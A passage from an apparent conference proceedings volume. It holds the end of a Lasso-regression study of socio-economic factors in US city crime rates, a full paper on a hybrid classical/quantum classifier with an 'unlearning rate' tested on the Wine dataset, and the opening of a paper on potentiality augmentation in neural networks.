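        b = sum(t - (predict(w, b, r) - b) for r, t in zip(X, y)) / n
    return w, b

def r_squared(w, b, X, y):
    y_bar = sum(y) / len(y)
    ss_res = sum((t - predict(w, b, r)) ** 2 for r, t in zip(X, y))
    ss_tot = sum((t - y_bar) ** 2 for t in y)
    return 1.0 - ss_res / ss_tot

# Toy data: y = 1 + 3 * x0, while x1 carries no information.
X = [[0.0, 1.0], [1.0, 0.0], [2.0, 1.0], [3.0, 0.0]]
y = [1.0, 4.0, 7.0, 10.0]

for alpha in [0.5, 1, 2, 3, 5, 10, 20, 50]:
    w, b = fit_lasso(X, y, alpha)
    kept = sum(1 for wj in w if wj != 0.0)
    print(alpha, kept, round(r_squared(w, b, X, y), 3))
```

In practice the R-squared used for selection would normally be computed on held-out data rather than on the rows used for fitting.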
3.5 Results

For alpha = 2.0, 20 out of 125 features have non-zero weight. These features, sorted by absolute magnitude, are shown in Table 2. Weights of larger magnitude indicate higher importance and impact of the feature on crime rate. A positive weight means a positive correlation between the feature value and crime rate; a negative weight means a negative correlation between the feature value and crime rate.

Table 2. Features with non-zero weight (sorted by absolute magnitude)

Feature                 Weight      Description
PctKidsBornNeverMar     1488.365    Kids born to never married parents
PctKids2Par             −1188.740   Kids in family with two parents
HousVacant              459.538     Unoccupied households
PctPersDenseHous        339.045     Persons in compact housing
NumInShelters           264.932     People in homeless shelters
MalePctDivorce          259.329     Divorced males
PctWorkMom              −231.423    Moms of kids under 18 in labor force
pctWInvInc              −169.676    Households with investment
agePct12t29             −168.183    In age range 12–29
PctVacantBoarded        122.692     Vacant housing that is boarded up
pctUrban                119.694     People living in urban areas
MedOwnCostPctIncNoMtg   104.571     Median owners’ cost
MedYrHousBuilt          91.412      Median year housing units built
RentQrange              86.356      Renting a house
OwnOccHiQuart           73.144      Owning a house
PctEmplManu             −57.530     People 16 and over who are employed in manufacturing
PctBornSameState        −49.394     People born in the same state as currently living
PctForeignBorn          23.449      People foreign born
PctLargHouseFam         20.144      Family households that are large (6 or more)
PctSameCity85           5.198       People living in the same city
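The ordering used in Table 2 (keep non-zero weights, sort by absolute magnitude) can be sketched as follows. The four weights are taken from Table 2; the zero-weight entry `SomeDroppedFeature` is a hypothetical placeholder for a feature that Lasso removed.

```python
# Feature weights: four values from Table 2 plus one hypothetical dropped feature.
weights = {
    "PctSameCity85": 5.198,
    "PctKids2Par": -1188.740,
    "SomeDroppedFeature": 0.0,   # hypothetical: a coefficient shrunk to zero
    "HousVacant": 459.538,
    "PctKidsBornNeverMar": 1488.365,
}

# Keep only features that survived regularization.
nonzero = {name: w for name, w in weights.items() if w != 0.0}

# Rank by absolute magnitude so strong negative weights are not buried.
ranked = sorted(nonzero.items(), key=lambda item: abs(item[1]), reverse=True)

for name, w in ranked:
    print(f"{name:22s} {w:10.3f}")
```

Sorting on the absolute value is what places PctKids2Par, with its large negative weight, second in the table.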
Although there are many interesting features to discuss from the results shown in Table 2, we will focus on the top two. The top antecedent in the list of features was Kids Born to Never Married Parents, with a positive weight of 1488.365. The second antecedent was Kids in Family Housing with Two Parents, with a negative weight of −1188.740. These two top antecedents indicate the importance of a stable family (one in which two parents are present) for raising kids who are less likely to commit crime in the future.
4 Conclusion

In this study, we employed machine learning, through the use of Lasso linear regression, in an effort to predict socio-economic antecedents that affect crime rate in US cities. The regression model was fitted to a data set sourced from the 1995 US FBI Uniform Crime Report, the 1990 United States Census, and the 1990 United States LEMAS (Law Enforcement Management and Administrative) Statistics Survey. The regression results indicated that the most influential factors affecting crime in US cities are related to stable families. Kids born into families with two parents are less likely to commit crime. These findings should help policy makers to create strategies and dedicate funding to help minimize crime.
References
1. Melossi, D.: Controlling Crime, Controlling Society: Thinking about Crime in Europe and America, 1st edn. Polity (2008)
2. Herath, H.M.M.I.S.B., Dinalankara, D.M.R.: Envestigator: AI-based crime analysis and prediction platform. In: Proceedings of Peradeniya University International Research Sessions, vol. 23, no. 508, p. 525 (2021)
3. Baumgartner, K.C., Ferrari, S., Salfati, C.G.: Bayesian network modeling of offender behavior for criminal profiling. In: Proceedings of the 44th IEEE Conference on Decision and Control (CDC-ECC), pp. 2702–2709 (2005)
4. Linning, S.J., Andresen, M.A., Brantingham, P.J.: Crime seasonality: examining the temporal fluctuations of property crime in cities with varying climates. Int. J. Offender Ther. Comp. Criminol. 61(16), 1866–1891 (2017)
5. Almanie, T., Mirza, R., Lor, E.: Crime prediction based on crime types and using spatial and temporal criminal hotspots. arXiv preprint arXiv:1508.02050 (2015)
6. Nguyen, T.T., Hatua, A., Sung, A.H.: Building a learning machine classifier with inadequate data for crime prediction. J. Adv. Inf. Technol. 8(2) (2017)
7. Ghosh, D., Chun, S., Shafiq, B., Adam, N.R.: Big data-based smart city platform: real-time crime analysis. In: Proceedings of the 17th International Digital Government Research Conference on Digital Government Research, pp. 58–66. ACM (2016)
8. McClendon, L., Meghanathan, N.: Using machine learning algorithms to analyze crime data. Mach. Learn. Appl. Int. J. (MLAIJ) 2(1), 1–12 (2015)
9. Phillips, P., Lee, I.: Mining top-k and bottom-k correlative crime patterns through graph representations. In: 2009 IEEE International Conference on Intelligence and Security Informatics, pp. 25–30 (2009). https://doi.org/10.1109/ISI.2009.5137266
10. Asuncion, A., Newman, D.J.: UCI Machine Learning Repository, School of Information and Computer Science, University of California, Irvine, CA (2007). https://www.archive.ics.uci.edu/ml/datasets/Communities+and+Crime
11. Kumar, D.: A Complete understanding of LASSO Regression. The Great Learning (26 December 2021). https://www.mygreatlearning.com/blog/understanding-of-lasso-regression/#:~:text=Lasso%20regression%20is%20a%20regularization,i.e.%20models%20with%20fewer%20parameters)
12. Kuhn, M., Johnson, K.: Feature Engineering and Selection: A Practical Approach for Predictive Models, 1st edn. CRC Press, New York (2019)
Hybrid Quantum Machine Learning Classifier with Classical Neural Network Transfer Learning
Avery Leider, Gio Giorgio Abou Jaoude, and Pauline Mosley
Pace University, Pleasantville, NY 10570, USA
{al43110n,ga97026n,pmosley}@pace.edu
Abstract. The hybrid model uses a minimally trained classical neural network as a pseudo-dimensional pool to reduce the number of features from a data set before using the output for forward and back propagation. This allows the quantum half of the model to train and classify data using a combination of the parameter shift rule and a new “unlearning rate” function. The quantum circuits were run using PennyLane simulators. The hybrid model was tested on the wine data set with promising results of up to 97% accuracy. The inclusion of quantum computing in machine learning represents great potential for advancing this area of scientific research because quantum computing offers the potential for vastly greater processing capability and speed. Quantum computing is currently primitive; however, this research takes advantage of mathematical simulators for its processing, which prepares this work to be used on actual quantum computers as soon as they become widely available for machine learning. Our research discusses a benchmark of a Classic Neural Network as made hybrid with the Quantum Machine Learning Classifier. The Quantum Machine Learning Classifier includes the topics of the circuit design principles, the gradient parameter-shift rule and the unlearning rate. The last section presents the results obtained, illustrated with visual graphs, with subsections on expectations, weights and metrics.

Keywords: Machine learning · Transfer learning · Deep learning · Quantum Machine Learning Classifier · Quantum computing mathematics

1 Introduction
The Hybrid Quantum Machine Learning Classifier (HQMLC) was developed in Python, based on a previous Quantum Machine Learning Classifier [6] and an open source classical network framework found on GitHub [7]. The HQMLC was trained and tested on the machine learning Wine dataset [10]. The code is available on Google Colab in two public Jupyter notebooks [4,5]. All links, comments and references for the code are given under the links and references tabs of the Colab notebooks.

© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 102–116, 2023. https://doi.org/10.1007/978-3-031-28073-3_8
The HQMLC is a combination model composed of a classical neural network and a quantum machine learning classifier. The hybrid model works by first training the classical network on the data for one epoch using a large learning rate. The small classical network is then folded to remove a layer, in a process similar to transfer learning. All the data is propagated through the folded network, and the output of this network is treated as data of reduced dimensionality. It is re-scaled and passed to the quantum machine learning classifier, which trains on this reduced-dimension data in a process similar to previous work [6].

The Wine data set [10] consists of 178 measurements. The data is the result of a chemical analysis of wines from three cultivars grown in the same region of Italy. A cultivar is a plant variety produced in cultivation by selective breeding. There are 13 attributes: alcohol, malic acid, ash, alkalinity of ash, magnesium, total phenols, flavanoids, nonflavanoid phenols, proanthocyanins, color intensity, hue, OD280/OD315 of diluted wines, and proline. All attributes are continuous. The dataset has three targets, referred to as targets zero, one and two. The previous Quantum Machine Learning Classifier [6] also worked with three targets (iris flower species), but that dataset had only four attributes, so the Wine dataset is a significantly more challenging classification problem.

Figure 1 shows a correlation matrix that illustrates the relationships between the measured characteristics in the data set. Red values are positive correlations, blue values are negative correlations, and zero is a neutral relationship. The matrix shows how strongly each attribute is directly correlated with every other attribute. A positive number (a red square) means that when one attribute takes a high standardized value, the attribute on the corresponding row or column tends to take a high value as well, with the size of the number giving the strength of that tendency. A negative number means the two attributes tend to move in opposite directions. The statistics of the data are given in Fig. 2 and Fig. 3.

As is customary in machine learning, the data was split into a training subset and a testing subset, in proportions of 75% training and 25% testing. This means that 45 of the 178 measurements were used for testing in every epoch, leaving 133 for training.

The rest of this paper discusses the Classic Neural Network and the Quantum Machine Learning Classifier. The Quantum Machine Learning Classifier section covers the circuit design principles, the gradient parameter-shift rule and the unlearning rate. The results section follows, illustrated with graphs, with subsections on expectations, weights and metrics. This is followed by a section on future work and a list of helpful definitions.
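The 45-measurement test subset follows from the 25% share of 178 rows. The sketch below reproduces that arithmetic with a plain index split; rounding the test share up, the fixed seed and the helper name `split_indices` are assumptions for illustration, not details taken from the notebooks [4,5].

```python
import math
import random


def split_indices(n_samples, test_fraction=0.25, seed=0):
    """Shuffle row indices and split them into (train, test) index lists."""
    # Assumption: the test share is rounded up, so 178 * 0.25 = 44.5 becomes 45.
    n_test = math.ceil(n_samples * test_fraction)
    indices = list(range(n_samples))
    random.Random(seed).shuffle(indices)
    return indices[n_test:], indices[:n_test]


train_idx, test_idx = split_indices(178)
print(len(train_idx), len(test_idx))
```

Shuffling before splitting keeps the three targets mixed across both subsets; whether the original notebooks stratify the split is not stated in the text.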
2 The Classic Neural Network
The classical neural network was designed using the GitHub repository [7] with modifications done to better tackle a hybrid model. The network shown in Fig. 4 was used. The input layer contained 13 neurons, one for each feature. The hidden layer contained six neurons to match the number of features that would be accepted by the circuits in the second half of the hybrid model. The output
A. Leider et al.
Fig. 1. Correlation matrix of wine data set
Fig. 2. Statistics of wine data set 1/2
Fig. 3. Statistics of wine data set 2/2
layer contained three neurons, one for each target. Different activation functions were tried for the final layer, with little difference in outcome; the sigmoid activation function performed best by a small margin. The cost function was the sum of squared errors, and training used a learning rate of 0.25 over one epoch. More testing is needed on the network design, including the hyper-parameters, but, based on limited results, larger-than-typical learning rates and linear activation functions proved most successful. The accuracy of the classical neural network after one epoch is appreciably low; it was measured only as a quality-control check.

After the epoch, the neural network is folded to only two layers, as shown in Fig. 5. This folded network serves to reduce the dimensionality of the features. The entire data set was propagated through the network. The output of this propagation was treated as a dataset that was re-scaled using normalization and multiplied by π, as suggested in previous work [6]. The resulting dataset consists of six unit-less features and is referred to as the pooled data set.
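As a rough illustration of the folding and re-scaling steps, the sketch below drops the output layer, propagates rows through the remaining 13-to-6 layer, and maps each resulting column onto [0, π]. The sigmoid hidden activation, the min-max form of normalization, the random placeholder weights and data, and all function names are assumptions made for illustration.

```python
import math
import random


def sigmoid(z):
    return 1.0 / (1.0 + math.exp(-z))


def folded_forward(row, hidden_weights, hidden_biases):
    """Propagate one row through the input-to-hidden layer only (output layer dropped)."""
    return [
        sigmoid(sum(w * x for w, x in zip(neuron_weights, row)) + bias)
        for neuron_weights, bias in zip(hidden_weights, hidden_biases)
    ]


def rescale_to_pi(rows):
    """Min-max normalise each column to [0, 1] (an assumption), then multiply by pi."""
    scaled_columns = []
    for column in zip(*rows):
        low, high = min(column), max(column)
        span = (high - low) or 1.0  # guard against a constant column
        scaled_columns.append([math.pi * ((value - low) / span) for value in column])
    return [list(row) for row in zip(*scaled_columns)]


rng = random.Random(0)
n_features, n_hidden = 13, 6
# Placeholder weights and rows; the real model uses trained weights and the Wine data.
hidden_weights = [[rng.uniform(-1, 1) for _ in range(n_features)] for _ in range(n_hidden)]
hidden_biases = [0.0] * n_hidden
data = [[rng.uniform(0, 1) for _ in range(n_features)] for _ in range(10)]

pooled = rescale_to_pi([folded_forward(row, hidden_weights, hidden_biases) for row in data])
```

Scaling to [0, π] keeps every pooled feature inside half a rotation, so distinct feature values are encoded as distinct rotation angles.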
3 Quantum Machine Learning Classifier
The Quantum Machine Learning Classifier (QMLC) is an iteration of the previous model [6]. The QMLC rests on three key components. First, the quantum circuits used to make the classifier are based on the Cappelletti design principles [1], with modifications to fit a multi-class classification problem. Second, the gradient parameter-shift rule used to determine the gradients has been studied extensively by other researchers, including the PennyLane developers [9]. Finally, the novel component in this iteration of the QMLC is the non-intuitive “unlearning rate”, a mechanism that attunes each circuit to the data matching its target by decreasing its tendency to produce high expectation values for data from every other target. Each of these components is explained further in later sections. The basic design of the QMLC consists of identical quantum circuits, one for each target of the classification problem. Using tools described later, each circuit is attuned to the data relating to a particular target by encoding the data as parameters in the circuit and changing the weights of that circuit to produce
higher expectation values for that data. In principle, if a row of data describes a target, then the circuits should produce expectation values that are low except for the circuit corresponding to that target. This is the basic working principle of quantum computing that has proven successful. The circuit design used to create the classifier, shown in Fig. 6, is drawn using Qiskit [8].
3.1 Circuit Design Principles
The work by Cappelletti et al. [1] gives general guidelines on the design of quantum circuits for machine learning. Their guidelines were tested on the simpler Iris data set and proved successful. Many of those design principles were employed here on the more complex Wine data set.
Fig. 4. Full classical neural network
Fig. 5. Folded classical neural network
Fig. 6. The QMLC circuit design
The first guideline followed was that the gates remain uni-dimensional. All the gates use rotations about the X-axis for the features and weights, which keeps the circuitry simple. The CZ gates in the circuit alternate in direction until the measurement is taken at the right end of the circuit. The second guideline followed was the general shape of the circuit. Emphasis was placed on keeping a long and thin shape that uses a minimal number of qubits. This may allow the model to be tested later on real quantum computers, with smaller topology designs even for larger numbers of targets. The final guideline followed was the proportion of weights to features and their placement in the circuit. As seen in Fig. 6, there are nearly twice as many weights as there are features. This is intentional: the design provides the best results of the QMLC without overtaxing the optimization process with too many weights.
By virtue of the design, an even number of features results in a superfluous final weight on the bottom qubit if the same pattern of two weights after two qubits is used before measuring the expectation. Adding a weight to the circuit at that location would serve no purpose, so the final weight is omitted. The output of the quantum circuit using a PennyLane [9] backend is an expectation value in the range [−1, 1]. For simplicity, when describing the results in later sections, the expectation values are shifted to the range [0, 1] by adding one and dividing by two. Changing the bounds in this manner allowed for easier analysis and explanation of the results.
3.2 Gradient Parameter-Shift Rule
Over the course of training a QMLC, the gradient is used to change the weights so that the output of each circuit increases when it is encoded with rows of data matching its target. The gradient is key to this process. It is calculated using the gradient parameter-shift rule, which has been studied by many, including the PennyLane developers [9]. The rule is given in Eq. 1 with respect to an individual weight Θ_i (theta), where B denotes the expectation value of the circuit and e_i the unit vector along the i-th weight.

$$\nabla_{\Theta_i} B(\Theta) = \frac{1}{2}\left[ B\left(\Theta + \frac{\pi}{2} e_i\right) - B\left(\Theta - \frac{\pi}{2} e_i\right) \right] \tag{1}$$

During training, each circuit is encoded with the next row of data. The gradient of each circuit with respect to each weight is calculated, giving a direction (positive or negative) and a magnitude. If the circuit number matches the target number for that row of data, the gradient is multiplied by the learning rate (alpha) and added to the current weight. If the circuit does not match the target, its weights are moved in the opposite direction, with a magnitude modified by the unlearning rate explained below.
3.3 Unlearning Rate
In typical machine learning explanations, the multivariate cost function is depicted as a three-dimensional surface with saddles, minima and maxima. The objective, in most models, is to find the combination of weight values that gives the global minimum. Re-purposing the gradient function to increase the expectation values can be thought of as moving the weights over a similar surface with the goal of finding the global maximum. For this reason, the visualization can also be re-purposed. There is one major difference. The weights of one circuit have no effect on the output or gradient calculations of the other circuits. This means that the surfaces describing the optimal weights for producing higher expectation values are disjoint from one circuit to the next. This leads to poor QMLC results when each circuit navigates only its own surface. The solution is the unlearning rate. When a row of data is used to optimize the classifier, the data is encoded into each circuit. For the circuit that matches the target corresponding to the row of
data, the weights are moved in the direction that increases the expectation value of the circuit, as described earlier. Every other circuit has its gradient multiplied by a factor proportional to the output of the circuits. This proportion is equal to the sum of the expectation values of the circuits that do not match the target divided by the sum of all the expectation values, as shown in the code below. Target expectation is the output of the circuit that matches the row of data, and sum expectation is the sum of all expectation values for that row of data. By using the expectation values as a proportion with which to modify the circuits, the surfaces described previously can be linked.

    target_expectation = circuit(features, weights[target])
    expectations = calc_expectations(features, weights, num_circuits=3)
    sum_expect = sum(expectations)
    beta = (sum_expect - target_expectation) / sum_expect
The two equations below are paraphrased from the code [5]. The first shows the change made to the weights (called parameters or params) when the weights belong to the circuit corresponding to the target of a row of data. The second shows the change made when the weights belong to a circuit that does not correspond to that row of data. The unlearning rate is denoted by beta, by analogy with the learning rate, which is typically denoted by alpha.

    params += alpha*parameter_shift(features, params)
    params += (-alpha*beta)*parameter_shift(features, params)

The use of the unlearning rate helps the weights of one circuit avoid a configuration that matches the behaviour of another circuit, by adjusting the path created by gradient descent. This is normally not needed in models where the gradient is calculated with respect to all other weights, but it is needed here because circuit weights do not affect the expectation values of other circuits. It is a peculiar workaround that needs further study.
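The update rules above can be sketched end to end with a toy stand-in for the circuits. In the sketch below, `circuit` is a hypothetical product of cosines rescaled to [0, 1], not the circuit of Fig. 6, and `training_step` is an illustrative name; only the parameter-shift formula of Eq. 1 and the expressions for beta and the two updates follow the text.

```python
import math


def circuit(features, weights):
    """Toy stand-in for one quantum circuit; returns an expectation in [0, 1]."""
    product = 1.0
    for x, w in zip(features, weights):
        product *= math.cos(x + w)
    return (1.0 + product) / 2.0


def parameter_shift(features, weights):
    """Gradient of circuit() for each weight, using shifts of +pi/2 and -pi/2 (Eq. 1)."""
    gradient = []
    for i in range(len(weights)):
        plus = list(weights)
        plus[i] += math.pi / 2
        minus = list(weights)
        minus[i] -= math.pi / 2
        gradient.append(0.5 * (circuit(features, plus) - circuit(features, minus)))
    return gradient


def training_step(features, target, weights, alpha=0.1):
    """Update every circuit's weights in place for one row of data; return beta."""
    expectations = [circuit(features, w) for w in weights]
    sum_expect = sum(expectations)  # assumed to be non-zero
    beta = (sum_expect - expectations[target]) / sum_expect  # unlearning rate
    for index, params in enumerate(weights):
        gradient = parameter_shift(features, params)
        # Matching circuit: step along the gradient. Others: step against it, scaled by beta.
        step = alpha if index == target else -alpha * beta
        for i, g in enumerate(gradient):
            params[i] += step * g
    return beta


features = [0.3, 1.2]
weights = [[0.5, 2.0], [1.0, 0.1], [2.5, 3.0]]  # one weight list per target
before = [circuit(features, w) for w in weights]
beta = training_step(features, target=0, weights=weights)
after = [circuit(features, w) for w in weights]
```

With a small alpha, one step raises the expectation of the matching circuit and lowers the others, which is the behaviour the unlearning rate is meant to produce.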
4 Results
All results were recorded at every optimization step of the classifier during training. This significantly slowed the QMLC but was necessary for the study of the model. The findings and results are discussed below.
4.1 Expectations
The QMLC produces an expectation value for each target in the classification problem. By design, the expectation values produced in the early epochs of training are effectively random. Over the course of training, this improves. If a circuit is working properly, it will produce low expectation values when looking
at rows of data not corresponding to its target, and high values otherwise. Each circuit becomes more attuned to its respective target, and the variance of its output increases. In Fig. 7, we see that in this trial the expectations of the QMLC initially hover closer to the center.
Fig. 7. Initial expectations of the QMLC hovering closer to the center
As the training continues with each gradient step, the expectation values move toward the extremes of the range [0, 1] more frequently. This can also be seen in Fig. 8. If the classifier is working properly, the circuit variances should mostly increase with training.
4.2 Weights
As suggested in previous work [6], the weights were randomly generated in the range [0, 2π]. This leads to significant increases in training speed: the weights had smaller distances to move and made less frantic turns in direction. Figure 9 shows the weights for all circuits. The repetitive, “static”-like motion that the weights exhibit comes from non-stochastic gradient descent. The classifiers are optimized with the same data in the same order every epoch. This means that the weights are pushed and pulled in the same order, resulting in the “static”. As in previous work [6], momentum operators or stochastic gradient descent may stabilize the motion of the weights. For comparison, Fig. 10 shows the weights for target number 0 alone, Fig. 11 the weights for target number 1, and Fig. 12 those for target number 2.
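A minimal sketch of the weight initialization described above, together with one way to vary the row order between epochs, as the stochastic alternative suggests. The count of 11 weights per circuit, the seed and the helper `epoch_order` are assumptions for illustration.

```python
import math
import random

rng = random.Random(42)  # fixed seed so the sketch is reproducible
n_circuits = 3
n_weights = 11  # assumption: nearly twice the six pooled features

# Each weight is drawn uniformly from [0, 2*pi].
weights = [
    [rng.uniform(0.0, 2.0 * math.pi) for _ in range(n_weights)]
    for _ in range(n_circuits)
]


def epoch_order(n_rows, rng, shuffle=True):
    """Return the order in which training rows are visited during one epoch."""
    order = list(range(n_rows))
    if shuffle:
        rng.shuffle(order)  # a new order each epoch breaks the repeated push-pull pattern
    return order


fixed_order = epoch_order(133, rng, shuffle=False)
shuffled_order = epoch_order(133, rng)
```

Passing `shuffle=False` reproduces the fixed ordering that the text associates with the “static”; whether shuffling actually stabilizes the weights is left open in the text.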
Fig. 8. Circuit variances increasing with training
4.3 Metrics
The metrics recorded, shown in Fig. 13, were an improvement on previous iterations of the QMLC [6]. Again, the model was able to overfit, and at an even faster speed. This is attributed to the changes made in weight generation and the unlearning rate equation. It should be noted that the classifier did not improve constantly.
5 Future Work
The continued success of the quantum machine learning model is promising. Future exploration is needed into the hyper-parameters, network layers and
Fig. 9. Recordings of the weights over the course of training
Fig. 10. Recordings of the circuit associated with target 0
Fig. 11. Recordings of the circuit associated with target 1
other aspects of the model. With more advancements in quantum computing, it is reasonable to assume there will be more access to qubits for academic research. Therefore, the next goal is to study larger data sets using quantum circuits rather than simulating the mathematics. Further study is needed to understand the effect of the unlearning rate and the possible use of parallelization.
Fig. 12. Recordings of the circuit associated with target 2
Fig. 13. Recordings of the quantum machine learning classifier metrics over the course of training
6 Definitions
For a more robust list, including previous definitions, refer to our previous work [6]. Quantum computing is a cross-section of computer science and quantum mechanics, a new science that is growing with new terms. Included here is a section reviewing the terms of quantum computing that are directly relevant. This covers quantum bits (“qubits”) and the specific gates, namely the CNOT gate, the CZ gate and the RX gate, used in the quantum circuit for the quantum machine learning classifier.
Activation Function: An activation function is the function that determines whether a neuron will output a signal based on the signals and weights of previous neurons and, if so, by how much.

Backpropagation: The algorithm by which a neural network decreases the distance between its output and its optimal possible output. The name is a contraction of the phrase “backward propagation”.

Bloch Sphere: The Bloch Sphere is the three-dimensional representation, with a radius of one, of the possible orientations a qubit can have, as described in the review of the lectures of Felix Bloch in [2]. It is analogous to the unit circle.

Circuit: A circuit is an ordered list of operations (gates) on a set of qubits that performs a computational algorithm.

CNOT Gate: The CNOT gate, or CX gate, causes a rotation in a target qubit based on the value of a control qubit.

$$\mathrm{CNOT} = \begin{pmatrix} 1 & 0 & 0 & 0 \\ 0 & 1 & 0 & 0 \\ 0 & 0 & 0 & 1 \\ 0 & 0 & 1 & 0 \end{pmatrix}$$

CZ Gate: The CZ gate, or controlled-Z gate, causes a rotation in a target qubit about the Z-axis based on the control qubit’s position on the Z-axis.

$$\mathrm{CZ} = \begin{pmatrix} 1 & 0 & 0 & 0 \\ 0 & 1 & 0 & 0 \\ 0 & 0 & 1 & 0 \\ 0 & 0 & 0 & -1 \end{pmatrix}$$

Dirac Notation: The Dirac notation, first described in [3], is the standard notation for quantum computing, in which vectors are represented through the use of ⟨bras| and |kets⟩ to denote, respectively, row and column vectors.

Epoch: An epoch is one iteration of training over the training set.

Expectation Value: The expectation value is the probabilistic value of a circuit, that is, the probability-weighted average of its measurement outcomes.

Fold: The process of removing layers in a classical neural network.

Gate: A gate is an operation performed on a qubit. Mathematically, the gate is described as a matrix that changes the values of a qubit. This value change corresponds to a rotation in three-dimensional space. The degree of the rotation can be a function of an input value. In that case, the gate is said to be parameterized by that value (called a parameter).

Learning Rate: A hyperparameter that determines the responsiveness of a model in the direction opposite the gradient. It is multiplied by the negative of the gradient to determine the change in a weight.
Neural Network: A neural network is a learning algorithm designed to resemble the neural connections in the human brain.

Neuron: A neuron is the basic building block of a neural network. Connected neurons have weights to stimulate predetermined activation functions.

Pooled Data Set: The data set after being propagated through a folded classical neural network, re-scaled and multiplied by π.

Qubit: The qubit is the quantum computing analog of a classical bit, represented as a vector of two numbers. The two numbers can be represented as a vector in three-dimensional space. A qubit is represented as a wire in the graphical representation of a circuit.

RX Gate: The RX gate causes a rotation of a qubit about the X-axis to a degree specified by a parameter. The angle of rotation is specified in radians and can be positive or negative.

$$RX(\theta) = \begin{pmatrix} \cos\frac{\theta}{2} & -i\sin\frac{\theta}{2} \\ -i\sin\frac{\theta}{2} & \cos\frac{\theta}{2} \end{pmatrix}$$

Testing Set: The set of data used to verify the accuracy of the trained neural network.

Training Set: The subset of data used to train the neural network.

Unlearning Rate: Unlike the learning rate, the “unlearning rate” is not a hyperparameter because it is determined by a function. The value is deterministic. It determines the responsiveness of the circuits in the direction of the gradient. It is multiplied by the product of the learning rate and the positive gradient to determine the change in a weight.

Weight: A weight can be thought of as the value denoting the strength of the connection between two neurons. It transforms the output signal of a neuron before it is fed into another neuron in the next layer.
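As a small worked check of the RX gate definition, the sketch below builds the RX matrix with plain Python complex numbers, applies it to a qubit starting in |0⟩, and evaluates the Z expectation value, which for this single-qubit case equals cos θ. The helper names are illustrative, and the code is independent of Qiskit and PennyLane.

```python
import math


def rx(theta):
    """2x2 RX(theta) matrix as nested lists of complex numbers."""
    half_cos = math.cos(theta / 2)
    half_sin = math.sin(theta / 2)
    return [
        [complex(half_cos, 0.0), complex(0.0, -half_sin)],
        [complex(0.0, -half_sin), complex(half_cos, 0.0)],
    ]


def apply_gate(gate, state):
    """Multiply a 2x2 gate matrix by a two-component state vector."""
    return [gate[row][0] * state[0] + gate[row][1] * state[1] for row in range(2)]


def expectation_z(state):
    """<Z> = |amplitude of |0>|^2 - |amplitude of |1>|^2, a value in [-1, 1]."""
    return abs(state[0]) ** 2 - abs(state[1]) ** 2


theta = 0.7
state = apply_gate(rx(theta), [1 + 0j, 0j])  # start in |0>
raw = expectation_z(state)   # equals cos(theta)
shifted = (raw + 1) / 2      # rescaled to [0, 1] by adding one and dividing by two
```

Two successive RX rotations add their angles, which is why a feature angle and a weight angle on the same qubit combine into a single rotation.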
References
1. Cappelletti, W., Erbanni, R., Keller, J.: Polyadic quantum classifier (2020). https://arxiv.org/pdf/2007.14044.pdf
2. Bloch, F., Walecka, J.D.: Fundamentals of statistical mechanics: manuscript and notes of Felix Bloch. World Scientific (2000)
3. Dirac, P.A.M.: A new notation for quantum mechanics. In: Mathematical Proceedings of the Cambridge Philosophical Society, vol. 35, pp. 416–418. Cambridge University Press (1939)
4. Jaoude, G.A.: Second Colab Notebook (2022). https://colab.research.google.com/drive/1f5QkqpgSs1K5apArZjHyV_gpZmGHfWDT?usp=sharing
5. Jaoude, G.A.: Google Colab Showing Code (2022). https://colab.research.google.com/drive/1s8B5rQh0dDb5yYgzmpgmWUf54YZ9PUju?usp=sharing
6. Leider, A., Jaoude, G.A., Strobel, A.E., Mosley, P.: Quantum machine learning classifier. In: Arai, K. (ed.) FICC 2022. LNNS, vol. 438, pp. 459–476. Springer, Cham (2022). https://doi.org/10.1007/978-3-030-98012-2_34
7. Aflack, O.: neural_network.ipynb (2018). https://colab.research.google.com/drive/10y6glU28-sa-OtkeL8BtAtRlOITGMnMw#scrollTo=oTrTMpTwtLXd
8. Open source quantum information kit. Qiskit (2022). https://qiskit.org/
9. PennyLane dev team. Quantum gradients with backpropagation (2021). https://pennylane.ai/qml/demos/tutorial_variational_classifier.html
10. Scikit-learn. Wine Dataset (2021). https://scikit-learn.org/stable/modules/generated/sklearn.datasets.load_wine.html
Repeated Potentiality Augmentation for Multi-layered Neural Networks
Ryotaro Kamimura
Tokai University and Kumamoto Drone Technology and Development Foundation, 2880 Kamimatsuo Nishi-ku, Kumamoto 861-5289, Japan

Abstract. The present paper proposes a new method to augment the potentiality of components in neural networks. The basic hypothesis is that all components should have equal potentiality (equi-potentiality) to be used for learning. This equi-potentiality of components has implicitly played critical roles in improving multi-layered neural networks. We introduce here the total potentiality and relative potentiality for each hidden layer, and we try to force networks to increase the potentiality as much as possible to realize the equi-potentiality. In addition, the potentiality augmentation is repeated at any time the potentiality tends to decrease, which is used to increase the chance for any components to be used as equally as possible. We applied the method to the bankruptcy data set. By keeping the equi-potentiality of components by repeating the process of potentiality augmentation and reduction, we could see improved generalization. Then, by considering all possible representations by the repeated potentiality augmentation, we can interpret which inputs can contribute to the final performance of networks.

Keywords: Equi-potentiality · Total potentiality · Relative potentiality · Collective interpretation · Partial interpretation
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 117–134, 2023. https://doi.org/10.1007/978-3-031-28073-3_9
1 Introduction
This section explains why the basic property of equi-potentiality should be introduced to improve generalization and interpretation. The equi-potentiality means that all components should be used as equally as possible in learning. In particular, we try to show how this basic property has been explicitly or implicitly used in several methods in neural networks by surveying the literature of many existing and important methods and hypotheses, such as competitive learning, mutual information, lottery ticket hypothesis, and interpretation methods.
1.1 Potentiality Reduction
The present paper proposes a method of increasing the potentiality of components as much as possible. The potentiality means to what degree the corresponding components contribute to the inner activity of neural networks. At the initial stage of learning,
the potentiality of components should be large, because the inner activity is not constrained by any outer conditions. In the course of learning, this initial potentiality tends to decrease, and the potentiality in neural networks is transformed into a form of information to be used actually in learning. For example, the potentiality of components should be decreased to reduce errors between outputs and targets in supervised learning. Thus, the potentiality for representing the inner activity tends to lose its strength implicitly and overtly in neural learning. One of the main problems is, therefore, how to increase the prior potentiality, because larger potentiality means more adaptability and flexibility in learning. In this context, this paper proposes a method of augmenting the potentiality to realize the equi-potentiality at any time.
1.2 Competitive Learning
